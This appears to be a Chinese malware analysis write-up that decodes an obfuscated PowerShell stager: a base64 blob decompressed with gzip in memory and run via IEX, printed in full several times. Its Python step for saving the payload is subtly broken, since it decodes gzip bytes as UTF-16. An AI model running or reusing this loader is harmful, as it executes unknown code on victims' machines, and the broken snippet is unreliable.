JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADQAKwBpAFMAaAByACsAMwBQADQASwBQAG4AUwBpAFIAcgBzAGIAQgBHADIAZAB6AFMAUQBIAEYAQgBRAEYAVgBQAEMAQwA5AHUAbAAwAHUASgBTAEkASQByAGMAcQBWAEQAZwB6AC8ALwAwAFUAcQBIADEANgBkAG4AcAAyAEoAOQBrADEASQBWAFkAVgA3AC8AVgA1AEwALwBXAGkAQQBmAFMAZwBvAGQAaQAxAGsAQgB6AFkAZwBIAGgAWQBnAEIAaQA2AGcAVQA4ADAAUwBxAFgANwBYAGkAQQBpADQAaQB2AHgAUgA3AG0AMABTAFgAdwBMADUAYwBmADUANABzADAAQgA2AEMAMgBNAEEAKwB2AE4AcwBPADAAWQBRAEUAagA4AFYAYgBxAGIARwBMAEYAeABJAEMAcgAzAFIAeQBOACsATwB3AFIAMgA0AG8ARQA2AFUAVwB4AHkAUQBtAEEAbgBNAGEAagBlADMAWgBYAHUAaQBxAFAARQBoADgAWQBHAHYAUABrAEcAYwBvAC8AZwA3AFEARABRAE4AcgBBAGgAVgBsAFIANQBZAGMATwB3AEYAeAB3AE0AMQAzAC8AOQA4AHEAVwBiAHgARABIAHcAMABXAFgALwAyAEEAZQBJAGgAUgBBAGMAVABNADgARgBzAEYASQBsAHYAaABIAEwATABZAGoAQgB3ADkAagBjAEEAUQBzAFIAZgB4AEgAMwBiADQAOQA5AEwAegBBAE4ANwAwAHEAVwBkAGcAMQByAGkAeAAxAGkAZgBUAHQALwBKAHcAVwBXAGsAWAB2AHcAcQBJAFcAZQBpAHkAcgBsAFAALwA4AHMAVgAxADgAZQBxAE4AZABIAFAAawBvAE0ARAAxAGIASwBXAGcAbwBSAE8ARAB6AGEAbgBsAGUAdQBFAHQAKwByAHUAYwBKAFoARwBvAEoASwBXAFgAYQB0AE8ASQBEAEIAQgBqADAAdQBYAFoAOQB1AFAATQA0AEwANgA1AFgAQwBlAFAAbABpAGUANwBsADYAOQBjAHcASgBEAGUAegBIAHIANQAzAE0AcABWADUANABLAG0AVwA4AG4ARwBCAHMAMgBBAHUARwA1AFQAcgB4AGsAdQB0ADcAZQBYADAAbAAvAG4AaQAzAFIAawAxADgANQBCADcAQQBvACsAZwBqAEUAQQBlAGgAQgB1AEsAagBhAHcASAA0AE8ARABCADgAMgB3AE0AcQAyAEcAQwAyAE0AcwBUAGgAOAA1ADEAeQBGAFIAcwBSAEEANQBUAEUAUABuAEcAegBCAGYATQBkAGcAegAyAG8AMwBQAHUASgA1ADkAVwB4ADMASgBmAGYAbABmAHQAYQBVAGMARABwAEIAdQA3AHYATQBsAFUAKwBNAG0ARwBxAEMAWQBxAHIAOQBXAHQATwAvAEEANABjAGMAcABFADMARgAzAEgAWQBuAFoAKwBzAC8ANQBCAGMAVgBmAHoANwBLAGMARwBxAHAAZQArAGwAVAAxAEwAVgBCAGgANQB3AEQAQQBUAGUARQBNAGIAMwBRADYANgBXADcAdQA1AGUAaQBpAFgAQQAvAGwAUQBtAEEAWABRAEwAdgBxADgARQBXAFMAZABrAGIASQBTAEIAZwBqAGoATgB3AHoAbQBMAEUAMQBCADkALwBTAGMAKwBGADcAVQAzAFQAbABqAC8AcABTAEQAcQB4AG4AWABsAHUAWQBUAG4AWQBzAGQAWAA0AG0AVQBSAHUAUABaAHIANgBhADUAYQB1AG0AWgBQAGYAdgA1AG0ASgBxADUAbgBnAHoAaAAvAC8AKwB0AHEANgBJAEcATgA2ADQATgBlADYAaABzAEgAMQA3AG8AbABmAE8AVwB6AG0ASQBHAE4AQgB3AG8AOABIAG0AOQBrAEMAcgBhAHoAVQByADYAKwBBAEgAYgB2AGkAawA0ADUAQgAvAFQAbABaAHoAYgArADQASwBKADMAWAB1ADUAaQBIAEcAdgBoAHUARQBOAHMARgBVADYASgA2AG8ALwBHAFgARwBKAFkASwBZAHUAKwBEAEEANABZAHYAOABzAGUAcAArAG4AOQBCAHAAYwBaAHUARgBGAGYAUwB5AHUAOQBhAGMALwAzAGUAUwA1ADMAUABRAFAAQwBPAGoARgBKAGMASgAxAGIAZABVAEkARABoAGcAZgBzAE8AcwBIADYAMABMADIAKwBZAGgATQBVAEYATQB2AHkAUAArAGIASwBpAFkAZABjAHkANABEAG8ASgB1ADYAMQArAGcAbQBrAFYAOQBYAGQAdwBNAGMAVgBrADEAZwA0AHUAaABpAEcAbQBSAFkAQwB5AHoAVwA4AEgASgBVADYATQBYAEIAdAB3AEsAVwBhADYAOQB4AE0ASwBIACsASwBTAGQAZgB3AFAARgB4AHkAVwBOAEkAUgB4AHcAUwBmADUARgBoAG8ASwBNACsAWgAyAEsANwAvAGUAMwA1AFUASAB6AFcAQQB4AEUAUABvAGcAUQBPAG0ATAByAHEAUQA0AEIAawBPADcAagBuAFgAaQBpAHIAUwB6AFgAQwBBAFgAZgA0AFAAWgB0AC8AcQA1AEYASQBVAE8AVgBZADMAawBEADQAWQBqAFIATgBBADgAdwBKAFUASgB4AFoAdQBqAEgAQgBmAEsAOQBkAC8AUwByAHoALwB6AGIAdwBmAFcAOAB3AFAAWgBuAFoAagBjAEEAMQBrAHAAUwBqAEUARgB5ADUARgBlAGIAawBVAGwARgBaACsAdQBYAHgAOQB4ADcASgBBAEwAawBZAFkATgBTAEUATwBEAHAAdwBCAFEAWQB2AFIAaQBqAFoAVwBLAGQAUAB0AEoAQgBKAFQAZQBUAGQAdAB4AFgAMwArAEsAQQB5AGkAQQBUAC8ARAB6AHgARQAvAGQAQwBUAHcAawBqAFIAVQBRADAANgBWAEwARAA0AFoAVAB3AGIAawBjAEMATgBPADIAegAwAG0ATwBTAFYAaQBNAHUATgBJAFcAaQBBAHgAWABSAGIAMQArAFkAMQA0AEgAQQBjAHIASwBqAGsAdwBsAEIAMgBLAFIAdwBXAGYAdwBlAGQAbwBBAEgAdgBpAHMAYwBjAE8ARwBsAEUAZwB0AEIAeQAzAGMANQBWAHoANABaACsAYQBKADgAcgBVAFIAZQBIAFoANwBBAHYATQBZAEEARwBGAG4ASAA0AGcASABqAGsAaAA2AG4AWQBDAHYASAA0AFMAagA5ADEAZwBpAFAAbgBhAHIAZABEAG4AVABqAFkARAArAEcARQBMADYASgBKADEAbwBsAEUAYgBHAE0ANAA1AEgAUwAxAHEARwBrAG4AMQBGADYAawBpAEwAZgBoAFEAMABYAHgAYgBNAHEAbQBwAE0ARgBTAHkAUgBvAHAAOQB3AG4ANQBwADkARQBBAGwAYgBmAHgAbwBaADQAOQBhAEIAagBPAHIAQQA2AE4AQgA3AGkALwBnAHAATQBqAHkAaAAwAE4AeABNAEUAeQAxAHAAdQBPAEsAcQBYAEsAeQBTAEUAUgBHAGMAZQBiAFIAawAzAFcAVwBSAG0AMwBNAHIAegBBAFkAawA3AE8AVwB5AGkAcgBUAHMAcwArAFcATABwAHcAcwBYAFoASABTAHcAVQByAHAAWQB4ADEAUgBzAG4AUwBZAGcAUwBJAEYAWgAzAFkAbgB0AHUASwBlAHAAdABtAFoATgBqAHQAVABHAHIAWAAyAGoAbwBaAHUAZABmAHgAVABvAFYAKwB6AHoAeQBkADcARABzAGYARABHAFYAcgBSAEUAKwBQAEEAcABLAG4AZgAwAHMAUwBkAGUASgBhAHMARQBDADMAMABZAFMAcwAyADAAbQA0AG8AdQBjAEQAawBOAGkAaQBYAE8ANQBUAFcAegByAEQARAA0AHoAVwBQAHoAcQBTAG0AcQBhAG0ATgA5AFgAcQBEAFcAVwArAEUAOQBmAHAAZABXAGMAWQArAEcARQAxAGgAdABRAGYAMABaAEwAUgBVAE0AbwB2AG0ASgBDAHUATgBSAGUAegBIAFoATgBSAHkAcwBlAHcAMgBrAG0AbAA4ADMAdQBQAEQANQBwAFMAYgA3ADgANgBkAEoAMQBkACsAVQBqAGYAVABHAFkAdwBhAFUAUABUAE0AbABJAFYAegBhAEcAYwBqAFgAeAArAFAATgBsAHYAUwBiAGIAQwByAGcAOQBaAGcAZAAxAFQAagBLAEEAMAAyAGoAVgBUAHIAUABEAEYAcwB1AHkAOAAxAFoAcABuAEMAbgBrAGkAKwB4AGcAZgBjAEUAKwBPAFAAcgBYADMAQQBEADcATgBhAEoAbgBxAGkAeQBZADgASABzADUAcQBtAG0AcABBADIAbABWAFIAcAB6AFAAbQAxADIAagBzAE0AZQBYAFYAUAA2AGYAMgBwAGsAbQBoADcAVABwADAASgBuAEsAdwB1AHIASgA2AHAAMgB4AGwATAB6AFgAdQA4AFEAOAA0AGsAZAA3ACsATAB0AHkAQgAwADEAcgBJAHAAMQBPAGIARABuAG4AcQBhADYAbABMAGsATQB1AEgAegA1AHIAbQBOAGsAcABUAFYANAAzAFEATgBtAFUAbgBqADAAQQBzAFcAMgA2ADEAagBRAGoASgBPAHkAYwA2AHEAMgAxAHkAcgAvAEoASABlAFIARABKAE4ARAB1AEoAcwBEAFkAUgAxAEcAdwBnADkAMABzAGkAQwByAE4AbgBhAGEAdwAyAFMATgBvADkAYQA2AEUAUwBRADkAZQB5AFcAVAA2AGwAVQBrADYAbABSADAAQgBnAHoAMgBWAEIATAAwAGoARgA3AG0AdABOAG4AUgBWAHYAZwBDAFkATQB6AHEASQBUAFMAWABHAFUASgBaAGoANABjAHoAeQBkAHIATgBlAFgAOQAzAGwASgBSAFYAMABkADYAdwBTAFMAOAA2AE8AdQByADgAYQBZAFIANgBtAEUAcgB6AE4AYgB5AGYARABMAHYAWgBNAHEAQwBhAGUAagBKAGcAVgBwADQAYQBEAHQAcQByAGoAZQBuAFIAUwBnAEoAeAB2AE0AegAzADIAeQB6AEoAMQA3AGIANgAzADEAaABJADQAdgBNAFgAbwBlAEwAcABYAGkAeQAzAEIASABaADcAbgBJAFIAcgA2AHcANAAwACsAZQBNAFoATgBoAFEAbABhAG4AVwBGAEcAVAA1AGsASQBZAHMAdABKAHEAVQAxADUASgAxAGEAZgBqAHMAUwBYADUAMwBlAGUAUwAwAFQAdgBiAEUAeQB5AGsAdwBuAGIATwAwADAAMwBWADIATQBLAEsARgAvAHYATwBTADkATwBiAFQAYwBCAGUAUgBvAHoANQBuAHkAZwB0AHYASwArADIAMwBwADgAawBUAHMAMQBMAE8AeQAyAG0AUQBIAGEAWABGAG8AcQBVAHcAYQBDAFEAdgA1AFcAQgBXAFcAOABsAEsATABXADEATwBCAE0AdABKAFUAawBwADIAMgBaADMAVwBHAFMAOABkAEgAZQBmAGkAMwB0AHYAaABQAE0ANQB3AFQAawB2ADQAMgBZAG0AMABLAGcASABHAFAAcAAxAHgAagBzAEYAaABrAE4AZgBLAFQAagB5AEcAcQBUAFcASwBlAFoAdQBIAE8AeABiAHYAcgBjAEYAQwBrAHMAMQBsAGQATABLAHoAUgBwAGcAbwBlAHQATgB3ADkAbQBMAFMAeABUAFYAdQA5AGsARwB0AEoAMABYAG8AMgBhAEkARgBlAHoAVABiAHIAeABTAFYASABPAHEAcQAwADUAeAByAGUAMgBvAHcARQA5AFIAcABiADgANwBKAE0AMQBjACsAQwAvAFQAQwB6AEQAdgBaAEoAbwBqAHgAYgBIAEwATwA3AC8AdAAvAEUAZgBqAC8AdwBVAFAARQBlADYALwBDAEgAUQBvADMAdgAvAHkAOABWAHEAdgBtAE0AOABQADcAbQA1AGYANwA4ACsAdAB0AHgAbgB2AGYAUAA1AGgAbgBMAEkAMQB1ADUAbgAyAHYAZQBIAE0AMABQAG4AUwA3AFgAdwAxAE8AcwBoAEgARAByAGUASABoAEwAbwBpAEgAbgA5AHYAVgBKAFEAUwB4AGMAQgAxAGgASgBvAEcAYgBjADEAUQBxAG4AMAAvAGQAZQB4AEQANwB3AE0ATQBUAEsAWgA1AFoAYgB3ADIAZgA5AGIAegBBAHkAbwBlAHUAWAAwAHcALwBlAEEAUwA4AEQARwBhAHYAKwBHAEsAYgA0AHkAWABkACsASABSAFYASgBkADQASgA4AGEAUgAxADgAYwBsAE0ATgBwAHQAaQBNAEwAbAA2AGUASgB2AFAAYgBvAFIAZgB2AHEAeQB4AGUALwBVAFAASQBFAHIAQQBkADkAQwAyAFQAcABCAG4AbQBpAFQASgAvAEoAOABoAHEANgBYAGYAaAA2AFUAYgBoAEcAbgBsAFgAVgB3ADkASAA4AHcAKwBXAFAASgBSAGsAMQBkAG8AcQBsADcAUgBqAHgAUAAvAEEAUAA2AFAAQQBmAGgAQgA2AFgAKwBIAE4AZwBlAHYAbQBPADMAZQBvAFMAcwBNACsAaAB5AHYAYQBxAG4AOABSADYAawBrAGIAbwBnAFAANQA5AEQATgA4AEoAYwBMAGkASQBoADIAawBYAHMAUQBHAFQARgA2ADIAQQBVAG0ALwBzAHcAcAA3AHUAMwBLAHYAVgBFAGwAUgBGADQAbgA3AGcAMwBpAE8ALwBHAEEAMwBXAE0AaAAzAGMARABmAE8AcgBHAFQANQBKAGMANABjAGYAbAAwACsAMABhAGMARABQAGYAQwArAEkAMQBRAGcAUQBYAHcANgBQADAAdwBEAEUAeQBjAHAAUQBEAFAAWQByAG4AbwBRAGsAaABPAGoATQAvACsAQgBqAFcANQBTAG8AbwBMAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA

base64解码：

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

继续怼其base64解码：

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

结果一看是乱码，往后再看：

New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress)

存在Gzip压缩，通过脚本解压，生成样本文件：

code2 = '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'
code2ed= base64.b64decode(code2).decode('UTF16')
f=open("decoded.gzip",'wb') 
f.write(code2ed) 
f.close

解压该Gzip：

获取到文件decoded：

